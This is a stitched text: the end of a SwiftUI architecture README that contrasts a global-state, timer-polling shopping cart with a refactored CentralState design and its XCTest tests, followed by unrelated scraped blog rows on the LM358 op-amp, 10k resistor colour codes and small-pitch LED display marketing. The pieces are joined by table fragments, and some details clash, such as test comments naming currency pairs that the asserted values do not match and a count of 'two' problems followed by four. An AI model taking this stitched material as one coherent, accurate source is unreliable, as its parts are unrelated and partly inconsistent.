```swift
// Example/BadCode/BadCode/Refactorability/Cart.swift
import SwiftUI
struct Cart: View {
@State private var cart: [InventoryItem]
private var currencyConverter: CurrencyConverter
@State private var timer: Timer?
init(
currencyConverter: CurrencyConverter
) {
self.cart = GlobalState.shared.cart
self.currencyConverter = currencyConverter
}
var body: some View {
VStack {
Text("Cart")
.font(.largeTitle)
if cart.isEmpty {
Text("Nothing in the cart")
} else {
List(cart) { item in
HStack {
Text(item.product)
Spacer()
Text(
currencyConverter.convertCurrency(
price: item.price,
fromCurrency: item.currency
)
)
}
}
}
}
.onAppear {
startWatchingCart()
}
.onDisappear {
stopWatchingCart()
}
}
func startWatchingCart() {
timer = Timer.scheduledTimer(withTimeInterval: 1, repeats: true) { _ in
cart = GlobalState.shared.cart
}
}
func stopWatchingCart() {
timer?.invalidate()
}
}
```
Here we have a new shopping cart module that shows the inventory items currently in the shopping cart. There are two very problematic things in this code, what are they?
Think about it!
The main issues with the code above are:
* Global State: The `GlobalState` is a problematic practice because it makes the system fragile and difficult to debug.
* Timer for Synchronization: The `Cart` uses a `Timer` to periodically update the local state from the global cart. This introduces a coupling to timing, which can lead to synchronization issues and unexpected behavior.
* Lack of Centralized State Management: There is no centralized place to manage the state updates, making the system unpredictable. Any part of the app can modify the global state, leading to potential conflicts and bugs.
* View Initialization: The views are initialized with local states that mirror the global state, which can become out of sync and cause inconsistencies in the UI.
This bad example showcases the issues of using global variables and timing dependencies, making the code hard to maintain and refactor. It demonstrates how these anti-patterns can lead to a brittle and unpredictable system.
Even though our modules are reusable and readable, by writing to global variables we are making our overall system very brittle. Any third-party library that we bring in could overwrite our `GlobalState.cart` with something else and break our app. Furthermore, any module we write can access it and modify it without any safeguards or centralized way of updating.
You might be saying, "Yeah, yeah I would never structure my app like this in the first place." That's great! Remember though, that even though this is exaggerated, the point is that the way the cart is updated and read is not centralized. If instead of using global variables and `Timer` you were using a message passing module, that could also make your code hard to understand and refactor at scale because it could be hard to isolate state and figure out how one module might affect another.
Let's see what this more refactorable code looks like:
```swift
// Example/GoodCode/GoodCode/Refactorability/States/Refactorability.CentralState.swift
import SwiftUI
class CentralState: ObservableObject {
static let shared = CentralState()
@Published var cart: [InventoryItem] = []
@Published var inventory: [InventoryItem] = []
@Published var localCurrency: Currency = .usd
func addToCart(item: InventoryItem) {
cart.append(item)
}
func setInventory(items: [InventoryItem]) {
inventory = items
}
func setLocalCurrency(currency: Currency) {
localCurrency = currency
}
}
```
```swift
// Example/GoodCode/GoodCode/Refactorability/States/Refactorability.Inventory.swift
import SwiftUI
struct Inventory: View {
@ObservedObject private var currencyConverter: CurrencyConverter
@EnvironmentObject var centralState: CentralState
init(currencyConverter: CurrencyConverter) {
self.currencyConverter = currencyConverter
}
var body: some View {
List(centralState.inventory) { item in
HStack {
Image(item.image)
.resizable()
.frame(width: 50, height: 50)
VStack(alignment: .leading) {
Text(item.product)
.font(.headline)
Text(item.description)
.font(.caption)
.foregroundColor(.gray)
}
Spacer()
Text(
currencyConverter.convert(
price: item.price,
fromCurrency: item.currency
)
)
.font(.headline)
.foregroundColor(.blue)
Button(action: {
centralState.addToCart(item: item)
}) {
Text("Add")
}
.buttonStyle(.bordered)
}
}
.listStyle(PlainListStyle())
}
}
```
```swift
// Example/GoodCode/GoodCode/Refactorability/States/Refactorability.Cart.swift
import SwiftUI
struct Cart: View {
@EnvironmentObject var centralState: CentralState
private var currencyConverter = CurrencyConverter()
var body: some View {
VStack {
Text("Cart")
.font(.largeTitle)
if centralState.cart.isEmpty {
Text("Nothing in the cart")
} else {
List(centralState.cart) { item in
HStack {
Text(item.product)
Spacer()
Text(convertedPrice(for: item))
}
}
}
}
}
func convertedPrice(for item: InventoryItem) -> String {
return currencyConverter.convert(price: item.price, fromCurrency: item.currency)
}
}
```
```swift
// Example/GoodCode/GoodCode/Refactorability/States/Refactorability.InventoryList.swift
import SwiftUI
struct InventoryList: View {
@EnvironmentObject var centralState: CentralState
@ObservedObject private var currencyConverter = CurrencyConverter()
var body: some View {
VStack {
Title()
Refactorability.Inventory(currencyConverter: currencyConverter)
Spacer()
NextButton()
}
}
func Title() -> some View {
Text("Inventory")
.font(.title)
.padding()
}
func NextButton() -> some View {
Section {
Text("Total in cart \(centralState.cart.count)")
.font(.headline)
.padding()
}
}
}
```
```swift
struct refactorabilityReusableGoodPreview: PreviewProvider {
static var previews: some View {
Refactorability.InventoryList()
.environmentObject(Refactorability.CentralState.mock)
}
}
```
This improved code centralizes our side effects to a method within the `CentralState` class, which takes an `InventoryItem` and adds it to the cart. The cart is managed as a `@Published` property within `CentralState`, ensuring that all components that depend on the cart's state are automatically notified and updated when the state changes. SwiftUI intelligently re-renders each updated view, maintaining a clear and predictable state flow.
This approach ensures that the state of the application can only be updated in one way, through the `CentralState` class. There's no need for global state modifications, no messages to pass, and no uncontrolled side effects that our modules can produce. The best part is, we can keep track of the entire state of our application, making debugging and QA much easier because we have an exact snapshot in time of our entire application.
One caveat to note: you might not need a complex state management solution in this project's example application. However, as the codebase grows, it would become more manageable to use a state management solution like the `CentralState` class instead of putting everything in top-level controllers. By isolating the state management in `CentralState` early on, we ensure that our application remains scalable and maintainable without requiring significant changes as it develops.
Explanation:
* Centralized State Management: `CentralState` class acts as a single source of truth for the application's state. It uses `@Published` properties to automatically notify views of state changes.
* Environment Object: By using `@EnvironmentObject`, we inject the central state into views that need access to the shared state, ensuring that state updates are managed centrally and propagated automatically.
* Simplified Conversion Logic: The `CurrencyConverter` class provides a method to convert prices based on currencies, similar to the provided currency converter in the JavaScript code.
* Structuring Views: `Inventory` and `Cart` are designed to work with the central state, accessing and modifying it via the `EnvironmentObject` pattern.
This structure makes it easier to manage state changes, ensures a clear flow of data, and reduces the potential for side effects and bugs. The state updates follow a predictable pattern, making the code easier to maintain and debug.
### Tests
The last thing we need to look at is tests. Tests give us confidence that we can change a module and it will still do what it was intended to do. We will look at the tests for the CentralState and CurrencyConverter:
```swift
// Example/GoodCode/Tests/CentralState.Tests.swift
import XCTest
@testable import GoodCode
class CentralStateTests: XCTestCase {
let centralState = Refactorability.CentralState.mock
func testAddToCart() {
let item = Readability.InventoryItem(
id: 0,
product: "Flashlight",
image: "placeholder",
description: "A really great flashlight",
price: 100,
currency: .usd
)
centralState.addToCart(item: item)
XCTAssertEqual(centralState.cart.count, 1)
XCTAssertEqual(centralState.cart.first, item)
}
func testSetInventory() {
let items = [
Readability.InventoryItem(
id: 0,
product: "Flashlight",
image: "placeholder",
description: "A really great flashlight",
price: 100,
currency: .usd
),
Readability.InventoryItem(
id: 1,
product: "Tin can",
image: "placeholder",
description: "Pretty much what you would expect from a tin can",
price: 32,
currency: .usd
),
Readability.InventoryItem(
id: 2,
product: "Cardboard Box",
image: "placeholder",
description: "It holds things",
price: 5,
currency: .usd
)
]
centralState.setInventory(items: items)
XCTAssertEqual(centralState.inventory, items)
}
func testSetLocalCurrency() {
let currency = Readability.Currency.usd
centralState.setLocalCurrency(currency: currency)
XCTAssertEqual(centralState.localCurrency, currency)
}
}
extension Readability.InventoryItem: Equatable {
public static func == (lhs: Readability.InventoryItem, rhs: Readability.InventoryItem) -> Bool {
lhs.id == rhs.id
}
}
```
```swift
// Example/GoodCode/Tests/CurrencyConverter.Tests.swift
import XCTest
@testable import GoodCode
class CurrencyConverterTests: XCTestCase {
func testConvert() {
let converter = Reusability.CurrencyConverter()
converter.localCurrency = .usd
// Test conversion from USD to Rupee
let usdToRupee = converter.convert(price: 100, fromCurrency: .usd)
XCTAssertEqual(usdToRupee, "$100.00")
// Test conversion from Rupee to Yuan
let rupeeToYuan = converter.convert(price: 500, fromCurrency: .rupee)
XCTAssertEqual(rupeeToYuan, "$7.49")
// Test conversion from Yuan to USD
let yuanToUsd = converter.convert(price: 1000, fromCurrency: .yuan)
XCTAssertEqual(yuanToUsd, "$145.56")
}
}
```
These tests ensure that the the CentralState and CurrencyConverter:
* Verifies that adding an item to the cart works correctly by checking if the cart contains the correct item and the count of items is as expected.
* Ensures the inventory is set correctly by comparing the current inventory state with the expected list of items.
*: Confirms that setting the local currency updates the state properly by checking if the local currency state matches the expected currency.
* Checks the conversion logic for different currency pairs to ensure accuracy. It tests conversion from USD to Rupee, Rupee to Yuan, and Yuan to USD to verify the correctness of the conversion values.
## Final Thoughts
Software architecture is the stuff that's hard to change, so invest early in a readable, reusable, and refactorable foundation. It will be hard to get there later on. By following the 3 Rs, your users will thank you, your developers will thank you, and you will thank yourself.
---
## Contributing
Thank you for your contributions!
Before opening a friendly Pull Request, make sure you run the following and resolve any errors noted by the linter.
Finally, change any relevant code examples in this `README.md` to reflect your changes.
## License
[MIT](LICENCE)
| maatheusgois |
1,917,979 | LM358 Overview | Introduction As far as we know, there are various configurations available for 555 timers, single... | 0 | 2024-07-10T02:33:40 | https://dev.to/candice88771483/lm358-overview-2de | lm358 | Introduction
As far as we know, there are various configurations available for 555 timers, single logic gates, microcontrollers, microprocessors, voltage regulators, and op-amps. These ICs include the LM741, LM7805, LM35, LM324 IC, LM337 IC, LM338 IC, LM339 IC, LM1117, and many others.
The most commonly used integrated circuit (IC) in electronic sensors and many other circuits is the LM358 IC. You will learn how to use it and explore different DIY electronics projects in this blog.
Ⅰ LM358 Overview
The [LM358 IC](https://www.blikai.com/blog/integrated-circuit/lm358-ic-features-applications-and-types) is a dual op-amp integrated circuit containing two op-amps powered by a common power supply. It can be considered as one-half of the LM324 Quad op-amp, which contains four op-amps with a common power supply. The differential input voltage range can be equal to the power supply voltage. The default input offset voltage is very low, typically around 2mV. The typical supply current is 500uA regardless of the supply voltage range, with a maximum current of 700uA. The operating temperature ranges from 0˚C to 70˚C ambient, while the maximum junction temperature can reach up to 150˚C.
LM358 Features
Consists of 2 op-amps internally.
High output voltage swing.
Large DC voltage gain of around 100 dB.
Wide bandwidth of 1 MHz (temperature compensated).
Very low supply current drain.
Wide power supply range: single power supply from 3V to 32V, dual power supply from ±1.5V to ±16V.
Low input offset voltage of 2mV.
Common mode input voltage range includes ground.
Differential input voltage range is similar to the power supply voltage.
Internally frequency compensated for unity gain.
Short circuit protected outputs.
Soldering pin temperature of 260°C.
Available in TO-99, SOIC, DSBGA, and CDIP packages. | candice88771483 |
1,917,980 | Decode the 10K Resistor Color Code Like a Pro! | Discovering the secret language of resistors, particularly the 10k resistor color code, is like... | 0 | 2024-07-10T02:39:54 | https://dev.to/candice88771483/decode-the-10k-resistor-color-code-like-a-pro-51d0 | webdev | Discovering the secret language of resistors, particularly the [10k resistor color code](https://www.blikai.com/blog/components-parts/10k-resistor-color-code-everything-you-need-to-know), is like cracking a cryptic code.
Think of resistors as traffic wardens for electrons in an electrical circuit. They control the flow of current and lower voltage levels within circuits. To put it in a more relatable way, they're like the speed bumps on your neighborhood roads, slowing down speeding cars (or in this case, electrons).
Consider this: you're building a model car for your kid. You'll need resistors to ensure the mini lights in the model don't burn out due to excess voltage. Thus, resistors are a vital component of all electronic devices, from the smallest toys to large supercomputers.
Different Types of Resistors
Just as there are various types of speed bumps, there are numerous types of resistors. They come in different forms, sizes, and resistance values, such as carbon film, metal film, wirewound, and SMD. The choice depends on the requirement, precision, and application.
Among the various resistors, our hero for the day is the 10K ohm resistor. It's commonly used in many electronic circuits due to its versatility and ideal resistance value.
Understanding Resistor Color Codes
The rainbow-like bands on resistors aren't just for decoration. They're a secret language, revealing the resistor's resistance, tolerance, and sometimes even temperature coefficient.
Each color represents a number from 0 to 9. These numbers, read in a particular order, help you understand the resistor's resistance value and tolerance.
Resistors can have 4, 5, or 6 bands. The 4-band resistors are like the original trilogy of Star Wars, widely recognized and adored. But then came the prequels and sequels, the 5-band and 6-band resistors, offering more precision and information.
| candice88771483 |
1,917,981 | Small-pitch LED display market: new opportunities and challenges | Introduction With the continuous advancement of technology and the growing market demand, the... | 0 | 2024-07-10T02:42:53 | https://dev.to/sostrondylan/small-pitch-led-display-market-new-opportunities-and-challenges-fd8 | led, display, pitch | Introduction
With the continuous advancement of technology and the growing market demand, the [small-pitch LED display](https://sostron.com/products/cobra-cob-led-display/) market is becoming the new favorite of the LED display industry. Despite the fierce competition and overcapacity in the domestic market, the rapid development of small-pitch LED displays has brought new growth points and market opportunities to Chinese companies.

Current situation of competition in the Chinese market
The Chinese LED display market has experienced a period of rapid development, but it has been followed by problems of market saturation and overcapacity. Against this background, many companies have begun to seek new market growth points in order to convert excess capacity into economic benefits. [How to find a Chinese LED screen factory? ](https://sostron.com/chinese-led-screen-factory-this-is-the-more-reliable-way-to-find-it/)

Exploration of international markets
Faced with the challenges of the domestic market, Chinese LED display companies have turned their attention to the international market to seek new growth opportunities. So, where are the main markets for Chinese LED display companies overseas?

Traditional advertising market
Although the technology of small-pitch LED display screens is becoming increasingly mature, the traditional LED display screen market still maintains strong vitality in some special fields. Especially in Southeast Asia, Africa and other regions, the traditional outdoor direct plug-in market still has broad development space. In addition, even in the European and American markets with high display requirements, the traditional advertising market also occupies an important position. [Here is everything about small-pitch LED displays. ](https://sostron.com/everything-about-small-pitch-led-display/)

Small-pitch LED display screen market
Small-pitch LED display screens are gradually becoming a new choice for urban commercial display application systems due to their advantages such as high clarity, high contrast and low energy consumption. According to statistics, the consumption and output value of small-pitch LEDs are growing rapidly, and it is expected that by 2021, the output value will reach 800 million US dollars. With the continuous advancement of technology, the dot pitch is also shrinking, and products such as P1.2 and P1.6 are gradually becoming the mainstream of the market. [Provide you with a guide to selecting the pitch of LED display screens. ](https://sostron.com/outdoor-led-display-spacing-selection-guide/)

Technology and market entry threshold
The industrial chain of the small-pitch LED display market is becoming more mature, and the market entry threshold is gradually lowered. This provides more companies with opportunities to enter the market, while also intensifying market competition. However, due to cost issues, products below P1.0 are still mainly laboratory products, with less mass production.

Overseas market analysis
Based on the sales of various companies in the first quarter of this year, we can understand the market situation of small-pitch LED displays in overseas markets. Especially in the European and American markets, P1.6 products have become the mainstream choice.
Conclusion
The development of the small-pitch LED display market has brought new opportunities to the LED display industry, but also challenges. Companies need to continue to innovate, improve product quality, and reduce costs to adapt to the ever-changing market demand. With the continuous advancement of technology and the continuous development of the market, we have reason to believe that the small-pitch LED display market will usher in a broader development prospect.
Thank you for watching. I hope we can solve your problems. Sostron is a professional LED display manufacturer. https://sostron.com/about-us/ We provide all kinds of displays, display leasing and display solutions around the world. If you want to know: [Transparent LED display: Leading the new modern vision.](https://dev.to/sostrondylan/transparent-led-display-leading-the-new-modern-vision-245o) Please click read.
Follow me! Take you to know more about led display knowledge.
Contact us on WhatsApp:https://api.whatsapp.com/send?phone=+8613570218702&text=Hello | sostrondylan |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.